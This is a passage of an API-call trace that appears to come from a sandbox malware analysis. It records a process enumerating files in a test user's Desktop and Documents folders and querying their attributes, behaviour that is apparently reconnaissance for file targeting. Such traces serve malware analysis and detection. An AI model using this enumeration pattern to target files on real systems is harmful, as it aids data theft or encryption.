nFileSizeLow=0xfb69)) returned 1 [0043.854] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.854] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x2981c0 [0043.854] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.854] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.854] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.855] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\8qH15DFNlBDTSg_.png" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\8qh15dfnlbdtsg_.png"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5371a5c0, ftCreationTime.dwHighDateTime=0x1d41a80, ftLastAccessTime.dwLowDateTime=0x4377d780, ftLastAccessTime.dwHighDateTime=0x1d4164c, ftLastWriteTime.dwLowDateTime=0x4377d780, ftLastWriteTime.dwHighDateTime=0x1d4164c, nFileSizeHigh=0x0, nFileSizeLow=0x8f0b)) returned 1 [0043.855] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.855] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.855] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x287e88 [0043.855] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.855] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.856] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.856] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.856] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.856] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\PkP4NBraSg.odt" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\pkp4nbrasg.odt"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde7c6ad0, ftCreationTime.dwHighDateTime=0x1d417cc, ftLastAccessTime.dwLowDateTime=0x8df4d3f0, ftLastAccessTime.dwHighDateTime=0x1d4154b, ftLastWriteTime.dwLowDateTime=0x8df4d3f0, ftLastWriteTime.dwHighDateTime=0x1d4154b, nFileSizeHigh=0x0, nFileSizeLow=0x17216)) returned 1 [0043.856] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.857] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\q4cBzyNkRYoNu_.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\q4cbzynkryonu_.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc75b220, ftCreationTime.dwHighDateTime=0x1d41237, ftLastAccessTime.dwLowDateTime=0x36d93620, ftLastAccessTime.dwHighDateTime=0x1d415d1, ftLastWriteTime.dwLowDateTime=0x36d93620, ftLastWriteTime.dwHighDateTime=0x1d415d1, nFileSizeHigh=0x0, nFileSizeLow=0x1a24)) returned 1 [0043.857] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.857] FindNextFileW (in: hFindFile=0x287e88, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.857] FindClose (in: hFindFile=0x287e88 | out: hFindFile=0x287e88) returned 1 [0043.857] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\gpOz- 8CcvKgzn0jszT7.doc" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\gpoz- 8ccvkgzn0jszt7.doc"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49872c40, ftCreationTime.dwHighDateTime=0x1d41541, ftLastAccessTime.dwLowDateTime=0xbc56c7e0, ftLastAccessTime.dwHighDateTime=0x1d4155e, ftLastWriteTime.dwLowDateTime=0xbc56c7e0, ftLastWriteTime.dwHighDateTime=0x1d4155e, nFileSizeHigh=0x0, nFileSizeLow=0xa823)) returned 1 [0043.858] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x287e88 [0043.858] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\aW0oa8wF.ots" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\aw0oa8wf.ots"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2007650, ftCreationTime.dwHighDateTime=0x1d41f24, ftLastAccessTime.dwLowDateTime=0xc504e820, ftLastAccessTime.dwHighDateTime=0x1d4172c, ftLastWriteTime.dwLowDateTime=0xc504e820, ftLastWriteTime.dwHighDateTime=0x1d4172c, nFileSizeHigh=0x0, nFileSizeLow=0x7d79)) returned 1 [0043.859] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\bURTK7dBgvQSJllk-tg5.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\burtk7dbgvqsjllk-tg5.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc816ae0, ftCreationTime.dwHighDateTime=0x1d41c70, ftLastAccessTime.dwLowDateTime=0x67716e30, ftLastAccessTime.dwHighDateTime=0x1d41d3b, ftLastWriteTime.dwLowDateTime=0x67716e30, ftLastWriteTime.dwHighDateTime=0x1d41d3b, nFileSizeHigh=0x0, nFileSizeLow=0xbfd9)) returned 1 [0043.859] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\L-r-wqjSB91lAG1o4E.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\l-r-wqjsb91lag1o4e.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4076dbe0, ftCreationTime.dwHighDateTime=0x1d4110f, ftLastAccessTime.dwLowDateTime=0x84d8d290, ftLastAccessTime.dwHighDateTime=0x1d41c84, ftLastWriteTime.dwLowDateTime=0x84d8d290, ftLastWriteTime.dwHighDateTime=0x1d41c84, nFileSizeHigh=0x0, nFileSizeLow=0xd9a5)) returned 1 [0043.859] FindClose (in: hFindFile=0x287e88 | out: hFindFile=0x287e88) returned 1 [0043.860] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x287e88 [0043.860] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\3xou5qDQw.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\3xou5qdqw.ppt"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb25af70, ftCreationTime.dwHighDateTime=0x1d41036, ftLastAccessTime.dwLowDateTime=0x46645e20, ftLastAccessTime.dwHighDateTime=0x1d41983, ftLastWriteTime.dwLowDateTime=0x46645e20, ftLastWriteTime.dwHighDateTime=0x1d41983, nFileSizeHigh=0x0, nFileSizeLow=0x7b2a)) returned 1 [0043.861] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\ivrW-PZZbHUd.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\ivrw-pzzbhud.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bb4070, ftCreationTime.dwHighDateTime=0x1d41f6d, ftLastAccessTime.dwLowDateTime=0x14d370a0, ftLastAccessTime.dwHighDateTime=0x1d4202f, ftLastWriteTime.dwLowDateTime=0x14d370a0, ftLastWriteTime.dwHighDateTime=0x1d4202f, nFileSizeHigh=0x0, nFileSizeLow=0x12803)) returned 1 [0043.864] FindClose (in: hFindFile=0x287e88 | out: hFindFile=0x287e88) returned 1 [0043.864] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.865] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\N4TX.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\n4tx.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fe16a80, ftCreationTime.dwHighDateTime=0x1d4118f, ftLastAccessTime.dwLowDateTime=0x21aea5e0, ftLastAccessTime.dwHighDateTime=0x1d41fe6, ftLastWriteTime.dwLowDateTime=0x21aea5e0, ftLastWriteTime.dwHighDateTime=0x1d41fe6, nFileSizeHigh=0x0, nFileSizeLow=0xd870)) returned 1 [0043.865] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\nMrCnz0SUWJ0Bz.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\nmrcnz0suwj0bz.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67393720, ftCreationTime.dwHighDateTime=0x1d41009, ftLastAccessTime.dwLowDateTime=0xfc4956c0, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xfc4956c0, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x600c)) returned 1 [0043.866] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\oQYQATJa.odt" (normalized: "c:\\users\\eebsym5\\desktop\\oqyqatja.odt"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dfeefb0, ftCreationTime.dwHighDateTime=0x1d41e7e, ftLastAccessTime.dwLowDateTime=0x87a8bce0, ftLastAccessTime.dwHighDateTime=0x1d4171d, ftLastWriteTime.dwLowDateTime=0x87a8bce0, ftLastWriteTime.dwHighDateTime=0x1d4171d, nFileSizeHigh=0x0, nFileSizeLow=0x1778a)) returned 1 [0043.866] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\p1rhDW8l6-FSZWcU.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\p1rhdw8l6-fszwcu.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e4a14c0, ftCreationTime.dwHighDateTime=0x1d419bd, ftLastAccessTime.dwLowDateTime=0x14865240, ftLastAccessTime.dwHighDateTime=0x1d4125e, ftLastWriteTime.dwLowDateTime=0x14865240, ftLastWriteTime.dwHighDateTime=0x1d4125e, nFileSizeHigh=0x0, nFileSizeLow=0x4e9d)) returned 1 [0043.866] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\rcYv8PKRE E.png" (normalized: "c:\\users\\eebsym5\\desktop\\rcyv8pkre e.png"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce633050, ftCreationTime.dwHighDateTime=0x1d41a80, ftLastAccessTime.dwLowDateTime=0xa036d150, ftLastAccessTime.dwHighDateTime=0x1d41a2b, ftLastWriteTime.dwLowDateTime=0xa036d150, ftLastWriteTime.dwHighDateTime=0x1d41a2b, nFileSizeHigh=0x0, nFileSizeLow=0x94f)) returned 1 [0043.867] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\S77MMXu8iTR1r.png" (normalized: "c:\\users\\eebsym5\\desktop\\s77mmxu8itr1r.png"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x480bc0f0, ftCreationTime.dwHighDateTime=0x1d41f33, ftLastAccessTime.dwLowDateTime=0x34f9bc0, ftLastAccessTime.dwHighDateTime=0x1d415c0, ftLastWriteTime.dwLowDateTime=0x34f9bc0, ftLastWriteTime.dwHighDateTime=0x1d415c0, nFileSizeHigh=0x0, nFileSizeLow=0x10582)) returned 1 [0043.867] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\sQsKCsZm3aZhrF94 TE.png" (normalized: "c:\\users\\eebsym5\\desktop\\sqskcszm3azhrf94 te.png"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abfef50, ftCreationTime.dwHighDateTime=0x1d41b87, ftLastAccessTime.dwLowDateTime=0x65721040, ftLastAccessTime.dwHighDateTime=0x1d41c81, ftLastWriteTime.dwLowDateTime=0x65721040, ftLastWriteTime.dwHighDateTime=0x1d41c81, nFileSizeHigh=0x0, nFileSizeLow=0x3d51)) returned 1 [0043.867] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\Tbdp.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\tbdp.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd0c170, ftCreationTime.dwHighDateTime=0x1d41162, ftLastAccessTime.dwLowDateTime=0xe9f0f8a0, ftLastAccessTime.dwHighDateTime=0x1d41087, ftLastWriteTime.dwLowDateTime=0xe9f0f8a0, ftLastWriteTime.dwHighDateTime=0x1d41087, nFileSizeHigh=0x0, nFileSizeLow=0x9103)) returned 1 [0043.868] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\TkOqe.png" (normalized: "c:\\users\\eebsym5\\desktop\\tkoqe.png"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e9fc250, ftCreationTime.dwHighDateTime=0x1d41bf4, ftLastAccessTime.dwLowDateTime=0x36cc3020, ftLastAccessTime.dwHighDateTime=0x1d41ecc, ftLastWriteTime.dwLowDateTime=0x36cc3020, ftLastWriteTime.dwHighDateTime=0x1d41ecc, nFileSizeHigh=0x0, nFileSizeLow=0x17824)) returned 1 [0043.868] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\ui8RNJ.xls" (normalized: "c:\\users\\eebsym5\\desktop\\ui8rnj.xls"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39edad40, ftCreationTime.dwHighDateTime=0x1d41cd0, ftLastAccessTime.dwLowDateTime=0x9f6ccf00, ftLastAccessTime.dwHighDateTime=0x1d41985, ftLastWriteTime.dwLowDateTime=0x9f6ccf00, ftLastWriteTime.dwHighDateTime=0x1d41985, nFileSizeHigh=0x0, nFileSizeLow=0x111a)) returned 1 [0043.868] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\uX0PKAywEq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\ux0pkayweq.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x730bbee0, ftCreationTime.dwHighDateTime=0x1d414b6, ftLastAccessTime.dwLowDateTime=0x58c67a10, ftLastAccessTime.dwHighDateTime=0x1d41aa7, ftLastWriteTime.dwLowDateTime=0x58c67a10, ftLastWriteTime.dwHighDateTime=0x1d41aa7, nFileSizeHigh=0x0, nFileSizeLow=0xf55b)) returned 1 [0043.869] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\V0d4yp.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\v0d4yp.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ff7050, ftCreationTime.dwHighDateTime=0x1d4135e, ftLastAccessTime.dwLowDateTime=0x6cfd840, ftLastAccessTime.dwHighDateTime=0x1d41e18, ftLastWriteTime.dwLowDateTime=0x6cfd840, ftLastWriteTime.dwHighDateTime=0x1d41e18, nFileSizeHigh=0x0, nFileSizeLow=0x15e30)) returned 1 [0043.869] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\X4F1oxr8DWGqb-B.png" (normalized: "c:\\users\\eebsym5\\desktop\\x4f1oxr8dwgqb-b.png"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf6219f0, ftCreationTime.dwHighDateTime=0x1d41625, ftLastAccessTime.dwLowDateTime=0x2e1cd970, ftLastAccessTime.dwHighDateTime=0x1d41742, ftLastWriteTime.dwLowDateTime=0x2e1cd970, ftLastWriteTime.dwHighDateTime=0x1d41742, nFileSizeHigh=0x0, nFileSizeLow=0x6688)) returned 1 [0043.869] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\Y1W-Fjl5.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\y1w-fjl5.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf763e3b0, ftCreationTime.dwHighDateTime=0x1d41886, ftLastAccessTime.dwLowDateTime=0x2fe4f8c0, ftLastAccessTime.dwHighDateTime=0x1d410bf, ftLastWriteTime.dwLowDateTime=0x2fe4f8c0, ftLastWriteTime.dwHighDateTime=0x1d410bf, nFileSizeHigh=0x0, nFileSizeLow=0x15eba)) returned 1 [0043.870] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\_lSWEqP5JJ6o4rznQ.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\_lsweqp5jj6o4rznq.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25a90e50, ftCreationTime.dwHighDateTime=0x1d41baf, ftLastAccessTime.dwLowDateTime=0x4a9d9870, ftLastAccessTime.dwHighDateTime=0x1d41b9b, ftLastWriteTime.dwLowDateTime=0x4a9d9870, ftLastWriteTime.dwHighDateTime=0x1d41b9b, nFileSizeHigh=0x0, nFileSizeLow=0x5354)) returned 1 [0043.870] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.870] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.871] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\4d0M7yinm.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\4d0m7yinm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef193220, ftCreationTime.dwHighDateTime=0x1d41cf8, ftLastAccessTime.dwLowDateTime=0x6779dcf0, ftLastAccessTime.dwHighDateTime=0x1d41688, ftLastWriteTime.dwLowDateTime=0x6779dcf0, ftLastWriteTime.dwHighDateTime=0x1d41688, nFileSizeHigh=0x0, nFileSizeLow=0x9fe3)) returned 1 [0043.871] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\5gjks84.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\5gjks84.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7abc0c0, ftCreationTime.dwHighDateTime=0x1d3b62a, ftLastAccessTime.dwLowDateTime=0x896d60c0, ftLastAccessTime.dwHighDateTime=0x1d4327b, ftLastWriteTime.dwLowDateTime=0x896d60c0, ftLastWriteTime.dwHighDateTime=0x1d4327b, nFileSizeHigh=0x0, nFileSizeLow=0x8dc)) returned 1 [0043.872] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7EZhzfHiIt6gjr8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\7ezhzfhiit6gjr8.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5273fc20, ftCreationTime.dwHighDateTime=0x1d40709, ftLastAccessTime.dwLowDateTime=0x6e8c3740, ftLastAccessTime.dwHighDateTime=0x1d3ec53, ftLastWriteTime.dwLowDateTime=0x6e8c3740, ftLastWriteTime.dwHighDateTime=0x1d3ec53, nFileSizeHigh=0x0, nFileSizeLow=0x28d5)) returned 1 [0043.872] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.872] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\3EehdTzU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\3eehdtzu.ppt"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159f8f80, ftCreationTime.dwHighDateTime=0x1d41163, ftLastAccessTime.dwLowDateTime=0x9f4662d0, ftLastAccessTime.dwHighDateTime=0x1d419a7, ftLastWriteTime.dwLowDateTime=0x9f4662d0, ftLastWriteTime.dwHighDateTime=0x1d419a7, nFileSizeHigh=0x0, nFileSizeLow=0x11e84)) returned 1 [0043.872] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\8GlaIxcO6o.ppt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\8glaixco6o.ppt"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47bfeaa0, ftCreationTime.dwHighDateTime=0x1d4112c, ftLastAccessTime.dwLowDateTime=0xdcc2dac0, ftLastAccessTime.dwHighDateTime=0x1d41ead, ftLastWriteTime.dwLowDateTime=0xdcc2dac0, ftLastWriteTime.dwHighDateTime=0x1d41ead, nFileSizeHigh=0x0, nFileSizeLow=0x18350)) returned 1 [0043.873] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\EOSf-TNnQP_Bkkp44.xls" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\eosf-tnnqp_bkkp44.xls"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b99e80, ftCreationTime.dwHighDateTime=0x1d41723, ftLastAccessTime.dwLowDateTime=0xb6f4ccb0, ftLastAccessTime.dwHighDateTime=0x1d41e15, ftLastWriteTime.dwLowDateTime=0xb6f4ccb0, ftLastWriteTime.dwHighDateTime=0x1d41e15, nFileSizeHigh=0x0, nFileSizeLow=0xc6d6)) returned 1 [0043.873] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.873] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\4eQ6cGOG NQcOFXw.odt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\4eq6cgog nqcofxw.odt"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72986b20, ftCreationTime.dwHighDateTime=0x1d41f60, ftLastAccessTime.dwLowDateTime=0xc51fe370, ftLastAccessTime.dwHighDateTime=0x1d416da, ftLastWriteTime.dwLowDateTime=0xc51fe370, ftLastWriteTime.dwHighDateTime=0x1d416da, nFileSizeHigh=0x0, nFileSizeLow=0x1b40)) returned 1 [0043.874] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\5HhEJEgP dGj.odt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\5hhejegp dgj.odt"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c6020c0, ftCreationTime.dwHighDateTime=0x1d419f9, ftLastAccessTime.dwLowDateTime=0x88aa3d00, ftLastAccessTime.dwHighDateTime=0x1d412ac, ftLastWriteTime.dwLowDateTime=0x88aa3d00, ftLastWriteTime.dwHighDateTime=0x1d412ac, nFileSizeHigh=0x0, nFileSizeLow=0x6cd)) returned 1 [0043.874] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\nPOu-PDRM w.odp" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\npou-pdrm w.odp"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba3ec590, ftCreationTime.dwHighDateTime=0x1d416d8, ftLastAccessTime.dwLowDateTime=0x88f0ce60, ftLastAccessTime.dwHighDateTime=0x1d41319, ftLastWriteTime.dwLowDateTime=0x88f0ce60, ftLastWriteTime.dwHighDateTime=0x1d41319, nFileSizeHigh=0x0, nFileSizeLow=0x21ed)) returned 1 [0043.875] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\tWFHPdGe eG__.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\twfhpdge eg__.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2e0f00, ftCreationTime.dwHighDateTime=0x1d415c8, ftLastAccessTime.dwLowDateTime=0x200c980, ftLastAccessTime.dwHighDateTime=0x1d41ca3, ftLastWriteTime.dwLowDateTime=0x200c980, ftLastWriteTime.dwHighDateTime=0x1d41ca3, nFileSizeHigh=0x0, nFileSizeLow=0x20bf)) returned 1 [0043.875] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.875] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gUa9.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gua9.rtf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119d9870, ftCreationTime.dwHighDateTime=0x1d41878, ftLastAccessTime.dwLowDateTime=0xb7abbb90, ftLastAccessTime.dwHighDateTime=0x1d41f10, ftLastWriteTime.dwLowDateTime=0xb7abbb90, 